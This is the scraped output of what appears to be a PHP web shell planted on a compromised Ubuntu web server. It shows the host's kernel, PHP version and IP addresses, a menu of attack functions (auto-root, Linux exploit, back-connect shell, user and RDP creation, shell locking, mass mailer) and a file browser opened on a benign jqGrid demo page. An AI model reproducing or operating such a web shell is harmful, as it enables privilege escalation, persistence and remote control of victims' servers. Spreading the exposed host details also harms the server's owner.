Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.37.211
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
guk_old /
gridsrch /
[ HOME SHELL ]
Name
Size
Permission
Action
jquery-ui-1.12.0.custom
[ DIR ]
drwxr-xr-x
jquery.jqGrid-3.8.2
[ DIR ]
drwxr-xr-x
gridsrc.html
951
B
-rwxr-xr-x
gridsrc.js
908
B
-rwxr-xr-x
gridsrc.php
1.87
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gridsrc.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>jqGrid Demo</title> <link rel="stylesheet" type="text/css" href="../JQGrid3.5/css/ui.jqgrid.css" media="screen"/> <link rel="stylesheet" type="text/css" href="../JQGrid3.5/css/jquery-ui-1.7.2.custom.css" /> <script type="text/javascript" src="jquery.jqGrid-3.8.2/js/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="jquery.jqGrid-3.8.2/js/i18n/grid.locale-en.js"></script> <script type="text/javascript" src="jquery.jqGrid-3.8.2/js/jquery.jqGrid.min.js"></script> </head> <body> <script type="text/javascript" src="gridsrc.js"></script> <center> <h2>jqGrid Example</h2> <!--Your grid will be diplayed here--> <table id="users"></table> <div id="usersPage"></div> <!--End of grid--> </center> </body> </html>
Close